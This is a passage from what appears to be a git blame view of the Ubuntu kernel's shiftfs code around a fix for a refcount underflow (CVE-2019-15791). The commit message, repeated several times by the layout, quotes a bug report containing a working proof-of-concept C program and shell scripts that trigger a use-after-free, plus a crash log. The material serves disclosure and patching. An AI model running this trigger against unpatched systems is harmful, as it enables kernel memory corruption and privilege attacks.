struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
struct fd lfd = {};
|
2019-04-04 13:39:13 +00:00
|
|
|
struct btrfs_ioctl_vol_args *v1 = NULL;
|
|
|
|
struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
|
|
|
|
|
2021-04-09 18:01:06 +00:00
|
|
|
*b1 = NULL;
|
|
|
|
*b2 = NULL;
|
|
|
|
|
2019-04-04 13:39:13 +00:00
|
|
|
if (!is_btrfs_snap_ioctl(cmd))
|
|
|
|
return 0;
|
|
|
|
|
|
|
|
if (cmd == BTRFS_IOC_SNAP_CREATE) {
|
|
|
|
v1 = memdup_user(arg, sizeof(*v1));
|
|
|
|
if (IS_ERR(v1))
|
|
|
|
return PTR_ERR(v1);
|
|
|
|
oldfd = v1->fd;
|
|
|
|
} else {
|
|
|
|
v2 = memdup_user(arg, sizeof(*v2));
|
|
|
|
if (IS_ERR(v2))
|
|
|
|
return PTR_ERR(v2);
|
|
|
|
oldfd = v2->fd;
|
|
|
|
}
|
|
|
|
|
|
|
|
src = fdget(oldfd);
|
2021-04-09 18:01:06 +00:00
|
|
|
if (!src.file) {
|
|
|
|
ret = -EINVAL;
|
|
|
|
goto err_free;
|
|
|
|
}
|
2019-04-04 13:39:13 +00:00
|
|
|
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
ret = shiftfs_real_fdget(src.file, &lfd);
|
|
|
|
if (ret) {
|
|
|
|
fdput(src);
|
2021-04-09 18:01:06 +00:00
|
|
|
goto err_free;
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
/*
|
|
|
|
* shiftfs_real_fdget() does not take a reference to lfd.file, so
|
|
|
|
* take a reference here to offset the one which will be put by
|
|
|
|
* __close_fd(), and make sure that reference is put on fdput(lfd).
|
|
|
|
*/
|
|
|
|
get_file(lfd.file);
|
|
|
|
lfd.flags |= FDPUT_FPUT;
|
|
|
|
fdput(src);
|
2019-04-04 13:39:13 +00:00
|
|
|
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
